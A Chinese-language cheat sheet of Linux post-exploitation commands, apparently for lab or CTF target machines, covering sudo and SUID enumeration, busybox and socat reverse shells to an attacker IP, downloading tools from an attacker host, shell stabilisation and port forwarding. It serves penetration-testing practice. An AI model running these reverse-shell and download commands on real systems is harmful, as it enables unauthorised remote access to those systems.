不断完善中....

检查变动

dpkg -V

dpkg -V 检测的文件范围

所有通过apt/dpkg安装的软件包文件
二进制可执行文件 (/usr/bin/, /usr/sbin/)
系统库文件 (/usr/lib/, /lib/)
配置文件 (/etc/)
系统服务文件

用户组

查看当前用户属组

id

groups $USER

sudo权限

基于/etc/sudoers 配置文件，允许被授权用户以另一个用户（通常是 root）的身份执行特定的命令。

查看当前用户拥有哪些 sudo 权限。

sudo -l

suid

查找系统中所有 suid 文件

find / -perm -4000 -type f 2>/dev/null

反弹shell

考虑busybox反弹shell的情况

• 靶机没有nc、ncat等反弹shell工具
• 阉割版nc，不具备反弹shell功能
• sh、bash反弹shell管道存在问题
• 使用Alpine Linux做基础镜像的容器，工具较少

busybox nc 攻击机IP 端口 -e /bin/sh 
# 创建命名管道
busybox mkfifo /tmp/f
/bin/sh -i 2>&1 < /tmp/f | busybox nc 攻击者IP 端口 > /tmp/f

busybox wget下载远程文件

busybox wget http://攻击机IP/文件 -O /本地路径/文件

反弹shell生成 https://the0n3.top/shell/ (opens new window)

稳定shell

行列数计算

stty -a|grep 'row'|awk -F'[ ;]+' '{print "stty "$4,$5,$6,$7}'

script /dev/null -c bash
# 按下 Ctrl+Z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
# 此处使用上面计算行列数的结果
stty rows 44 columns 208

或者使用 socat 获得一个完全交互式的TTY

kali

socat file:`tty`,raw,echo=0 tcp-listen:4444

靶机

/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.6.101:4444

丢失用户名主机名环境变量可以重新设置

echo "export PS1='\[\e[1;31m\]\u\[\e[0m\]@\[\e[1;32m\]\h\[\e[0m\]:\[\e[1;34m\]\w\[\e[0m\]\\$ '" >> ~/.bashrc
source ~/.bashrc

好看的提示符

# 彩色提示符
export PS1='\[\e[1;31m\]\u\[\e[0m\]@\[\e[1;32m\]\h\[\e[0m\]:\[\e[1;34m\]\w\[\e[0m\]\$ '

# 带时间戳的
export PS1='\[\e[1;33m\][\t]\[\e[0m\] \u@\h:\w\$ '

# 简单的
export PS1='\u@\h:\w\$ '

端口转发

常备socat

busybox wget http://192.168.56.100/socat -O ./socat
chmod +x ./socat
nohup ./socat TCP-LISTEN:8081,bind=0.0.0.0,fork TCP:127.0.0.1:8080 &

文件查找

查找最近7天变动文件的方法，打群友靶机可能有奇效（）

find / -perm -4000  2>/dev/null

# 查找最近7天变动的文件
find / \
  \( -path /run -o -path /sys -o -path /proc -o -path /var/lib -o -path /dev -o -path /usr -o -path /var/log -o -path /var/cache -o -path /boot/grub \) -prune -o \
  \( -mtime -7 -o -ctime -7 \) -print 2>/dev/null